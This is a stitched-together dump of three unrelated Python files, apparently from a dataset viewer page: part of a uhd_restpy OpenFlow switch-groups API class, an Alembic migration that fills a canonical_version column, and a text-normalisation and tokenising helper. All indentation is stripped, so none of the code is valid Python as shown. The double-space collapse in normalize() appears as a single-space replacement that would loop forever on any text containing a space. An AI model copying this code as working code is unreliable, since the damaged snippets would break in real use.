# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Can be of the following types per switch: 1)All: Execute all buckets in the group. 2)Select:Execute one bucket in the group. 3)Indirect:Execute the one defined bucket in this group. 4)Fast Failover:Execute the first live bucket.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['GroupType']))
@property
def MaxNumberOfGroups(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Maximum number of groups for each group type.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['MaxNumberOfGroups']))
@property
def Name(self):
# type: () -> str
"""
Returns
-------
- str: Name of NGPF element, guaranteed to be unique in Scenario
"""
return self._get_attribute(self._SDM_ATT_MAP['Name'])
@Name.setter
def Name(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['Name'], value)
@property
def Output(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Group Action:Output to switch port.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Output']))
@property
def ParentSwitch(self):
# type: () -> str
"""
Returns
-------
- str: Parent Switch Name.
"""
return self._get_attribute(self._SDM_ATT_MAP['ParentSwitch'])
@property
def PopMpls(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Group Action:Pop the outer MPLS tag.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['PopMpls']))
@property
def PopPbb(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Group Action:Pop the outer PBB service tag (I-TAG).
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['PopPbb']))
@property
def PopVlan(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Group Action:Pop the outer VLAN tag.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['PopVlan']))
@property
def PushMpls(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Group Action:Push a new MPLS tag.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['PushMpls']))
@property
def PushPbb(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Group Action:Push a new PBB service tag (I-TAG).
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['PushPbb']))
@property
def PushVlan(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Group Action:Push a new VLAN tag.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['PushVlan']))
@property
def SetField(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Group Action:Set a header field using OXM TLV format.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SetField']))
@property
def SetMplsTtl(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Group Action:Set MPLS TTL.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SetMplsTtl']))
@property
def SetNetwork(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Group Action:Set IP TTL.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SetNetwork']))
@property
def SetQueue(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Group Action:Set queue id when outputting to a port.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SetQueue']))
def update(self, Name=None):
# type: (str) -> SwitchGroupsList
"""Updates switchGroupsList resource on the server.
This method has some named parameters with a type: obj (Multivalue).
The Multivalue class has documentation that details the possible values for those named parameters.
Args
----
- Name (str): Name of NGPF element, guaranteed to be unique in Scenario
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
def add(self, Name=None):
# type: (str) -> SwitchGroupsList
"""Adds a new switchGroupsList resource on the json, only valid with config assistant
Args
----
- Name (str): Name of NGPF element, guaranteed to be unique in Scenario
Returns
-------
- self: This instance with all currently retrieved switchGroupsList resources using find and the newly added switchGroupsList resources available through an iterator or index
Raises
------
- Exception: if this function is not being used with config assistance
"""
return self._add_xpath(self._map_locals(self._SDM_ATT_MAP, locals()))
def find(self, Count=None, DescriptiveName=None, Name=None, ParentSwitch=None):
# type: (int, str, str, str) -> SwitchGroupsList
"""Finds and retrieves switchGroupsList resources from the server.
All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve switchGroupsList resources from the server.
To retrieve an exact match ensure the parameter value starts with ^ and ends with $
By default the find method takes no parameters and will retrieve all switchGroupsList resources from the server.
Args
----
- Count (number): Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.
- DescriptiveName (str): Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.
- Name (str): Name of NGPF element, guaranteed to be unique in Scenario
- ParentSwitch (str): Parent Switch Name.
Returns
-------
- self: This instance with matching switchGroupsList resources retrieved from the server available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
"""Retrieves a single instance of switchGroupsList data from the server.
Args
----
- href (str): An href to the instance to be retrieved
Returns
-------
- self: This instance with the switchGroupsList resources from the server available through an iterator or index
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
def get_device_ids(self, PortNames=None, Active=None, ApplyGroup=None, CopyTtlIn=None, CopyTtlOut=None, DecrementMplsTtl=None, DecrementNetwork=None, GroupType=None, MaxNumberOfGroups=None, Output=None, PopMpls=None, PopPbb=None, PopVlan=None, PushMpls=None, PushPbb=None, PushVlan=None, SetField=None, SetMplsTtl=None, SetNetwork=None, SetQueue=None):
"""Base class infrastructure that gets a list of switchGroupsList device ids encapsulated by this object.
Use the optional regex parameters in the method to refine the list of device ids encapsulated by this object.
Args
----
- PortNames (str): optional regex of port names
- Active (str): optional regex of active
- ApplyGroup (str): optional regex of applyGroup
- CopyTtlIn (str): optional regex of copyTtlIn
- CopyTtlOut (str): optional regex of copyTtlOut
- DecrementMplsTtl (str): optional regex of decrementMplsTtl
- DecrementNetwork (str): optional regex of decrementNetwork
- GroupType (str): optional regex of groupType
- MaxNumberOfGroups (str): optional regex of maxNumberOfGroups
- Output (str): optional regex of output
- PopMpls (str): optional regex of popMpls
- PopPbb (str): optional regex of popPbb
- PopVlan (str): optional regex of popVlan
- PushMpls (str): optional regex of pushMpls
- PushPbb (str): optional regex of pushPbb
- PushVlan (str): optional regex of pushVlan
- SetField (str): optional regex of setField
- SetMplsTtl (str): optional regex of setMplsTtl
- SetNetwork (str): optional regex of setNetwork
- SetQueue (str): optional regex of setQueue
Returns
-------
- list(int): A list of device ids that meets the regex criteria provided in the method parameters
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._get_ngpf_device_ids(locals())
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Data migration for canonical_version column
Revision ID: 1fdf5dc6bbf3
Revises: f7577b6938c1
Create Date: 2018-02-28 22:40:42.495355
"""
import sqlalchemy as sa
from alembic import op
from packaging.utils import canonicalize_version
revision = "1fdf5dc6bbf3"
down_revision = "f7577b6938c1"
releases = sa.Table(
"releases",
sa.MetaData(),
sa.Column("version", sa.Text(), primary_key=True),
sa.Column("canonical_version", sa.Text()),
)
def upgrade():
connection = op.get_bind()
version_query = sa.select([releases.c.version]).distinct()
for release in connection.execute(version_query):
connection.execute(
releases.update()
.where(
sa.and_(
releases.c.version == release.version,
releases.c.canonical_version.is_(None),
)
)
.values(canonical_version=canonicalize_version(release.version))
)
op.alter_column("releases", "canonical_version", nullable=False)
def downgrade():
raise RuntimeError("No such thing as decanonicalization!")
|
"""
Taken from the Helmut project.
https://github.com/okfn/helmut/blob/master/helmut/text.py
"""
from unicodedata import normalize as ucnorm, category
def normalize(text):
""" Simplify a piece of text to generate a more canonical
representation. This involves lowercasing, stripping trailing
spaces, removing symbols, diacritical marks (umlauts) and
converting all newlines etc. to single spaces.
"""
if not isinstance(text, str):
text = str(text)
text = text.lower()
decomposed = ucnorm('NFKD', text)
filtered = []
for char in decomposed:
cat = category(char)
if cat.startswith('C'):
filtered.append(' ')
elif cat.startswith('M'):
# marks, such as umlauts
continue
elif cat.startswith('Z'):
# newlines, non-breaking etc.
filtered.append(' ')
elif cat.startswith('S'):
# symbols, such as currency
continue
else:
filtered.append(char)
text = u''.join(filtered)
while ' ' in text:
text = text.replace(' ', ' ')
#remove hyphens
text = text.replace('-', ' ')
text = text.strip()
return ucnorm('NFKC', text)
def url_slug(text):
text = normalize(text)
text = text.replace(' ', '-')
text = text.replace('.', '_')
return text
def tokenize(text, splits='COPZ'):
token = []
for c in str(text):
if category(c)[0] in splits:
if len(token):
yield u''.join(token)
token = []
else:
token.append(c)
if len(token):
yield u''.join(token)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.